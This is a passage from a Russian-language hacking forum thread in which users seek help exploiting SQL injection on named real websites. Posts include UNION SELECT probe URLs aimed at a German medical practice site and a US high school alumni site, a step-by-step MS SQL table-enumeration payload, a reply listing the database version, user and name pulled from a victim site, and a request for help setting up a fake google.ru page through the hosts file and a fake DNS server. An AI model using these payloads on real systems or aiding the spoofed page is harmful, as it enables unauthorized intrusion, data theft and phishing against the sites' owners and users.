почему это не показывают, введенный номер? http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6+--+ http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6 limit 0,1+--+
PHP: $server=mysql_real_escape_string($_GET["server_name"]); $query = mysql_query("SELECT `player_id` FROM `".$config->db_prefix."_bans` WHERE `player_id`='".$server."' AND `expired`=0") or die (mysql_error()); Что можно сделать, что бы выдалась ошибка?
Во всех факах про sql-injection при подборе столбцов описаны только варианты, когда вылетают ошибки, а если отчет об ошибках выключен, то как подобрать количество столбцов?
Пожалуйста, помогите как вводить этот сайт? http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977' http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977# <-true
Привет Есть SQL инъекция Code: site.ru/index.php&name=1' Поле name уязвимо Если запрос прошел успешно то в браузере высвечивается 1 если еррор то 0 Известно что база MS SQL Можно ли провести Blind SQL-inj? если да то подскажите статью как сделать это на MS SQL Можно ли отправить запрос типа INSERT или UPDATE или еще что-то подобное чтоб проникнуть на сервер или изменить/создать данные в базе
2Byrger 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))-- потом 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 2+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))-- потом 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 3+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))-- и т.д. (c) scipio http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/ https://forum.antichat.ru/showthread.php?t=30501
я одного не понимаю, что ты ждешь? что бы за тебя раскрутили скулю?задолбали таки вопросы ..тут стандартная скуль, сам и раскручивай... тщательно не рекомендую никому помогать данному индивидууму, за него скуль раскручивай , а он перед своими одноклассниками будет крутым хацкером...думаю предложить за такое сразу в бан посылать.сколько таких умников которые подставляют ковычку..и постят здесь результат..и жалобно поют помочь им, а мануалы кто читать будет? Version:5.1.47 User:hflation_hf@localhost Database:hflation_hf поставь перед собой вопрос как узнать инфу которую я узнал...а не ныть здесь что бы за тебя все сделали...
Я же говорю что сайт явных ощибок не выдает так что обычная инъекция в MS SQL Не катит там где в ошибке выводится имя таблиц и так далее Сайт сообщает только о вверном или не верном запросе
Подскажите, как правильно настроить фейковую страничку www.google.ru Экспериментирую на своем компе, прописываю в файле C:\windows\system32\drivers\etc\hosts www.google.ru 1111.2222.3333.4444 http://google.ru/ 1111.2222.3333.4444 Все ровно попадаю на настоящую страничку www.google.ru И. если можно дайте ссылку, как настроить фейковый DNS сервер.
ну зачем же сразу наезжать я вот честно говоря не пойму, как ее раскручивать, order by & group by не работают вроде. поэтому и спрашиваю, как крутить. вот и ставлю вопрос, как ты раскрутил? ну нуб я и что в этом плохого. кто нубом не был?
Ты даже не знаешь как выглядет формат IPv4, иди вот тут прочитай http://en.wikipedia.org/wiki/IPv4 что это такое, а я тебе потом помогу настроить твой hosts.
у мeня работает ордер бай а у тебя нет...великий дух мускуля меня боится и дает доступ..а вот тебя определил и сразу послал ... я кажется тебе ясно сказал..читай мануалы..
